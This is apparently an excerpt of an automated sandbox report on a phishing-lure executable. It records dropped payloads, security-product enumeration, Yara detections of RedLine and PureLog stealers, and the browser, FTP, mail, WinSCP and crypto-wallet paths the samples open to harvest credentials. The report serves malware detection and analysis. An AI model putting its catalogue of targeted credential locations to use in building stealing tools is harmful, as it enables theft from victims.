Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTE406.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTE455.tmp VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msdtc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\Locator.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\SensorDataService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\snmptrap.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\TieringEngineService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AgentService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\vds.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wbengine.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\TieringEngineService.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_004223BC

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_004711D2 GetUserNameW,

0_2_004711D2

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

0_2_0042039F

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0040E470

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 4.3.microsofts.exe.6a0000.1115.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.6a0000.923.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.6800000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.6d0000.1001.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.7dde10.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.6800000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.7dde10.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.6b0000.1002.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.6a0000.1158.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Native_Redline_BTC.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2074768669.00000000073D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1766272892.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1759244489.0000000000312000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1768367240.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2069994712.00000000073D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.12744d08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.127db188.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.12744d08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.1278ff50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.1278ff50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.build.exe.330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.127db188.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1795311525.0000000012787000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1782677998.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1946375903.0000000002736000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2073816640.00000000062D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1795311525.00000000126F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1795311525.00000000127D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2069513140.00000000062D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: microsofts.exe PID: 2172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_Redline_BTC.exe PID: 4340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000002.1754480063.0000000000482000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Binary or memory string: WIN_XP
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Binary or memory string: WIN_XPe
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Binary or memory string: WIN_VISTA
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Binary or memory string: WIN_7

Source: Yara match

File source: 0000000B.00000002.1946375903.0000000002736000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 4.3.microsofts.exe.6a0000.1115.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.6a0000.923.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.6800000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.6d0000.1001.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.7dde10.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.6800000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.7dde10.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.6b0000.1002.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.microsofts.exe.6a0000.1158.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Native_Redline_BTC.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2074768669.00000000073D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1766272892.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1759244489.0000000000312000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1768367240.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2069994712.00000000073D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.12744d08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.127db188.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.12744d08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Native_Redline_BTC.exe.1278ff50.5.raw.unpack, type: UNPACKEDPE
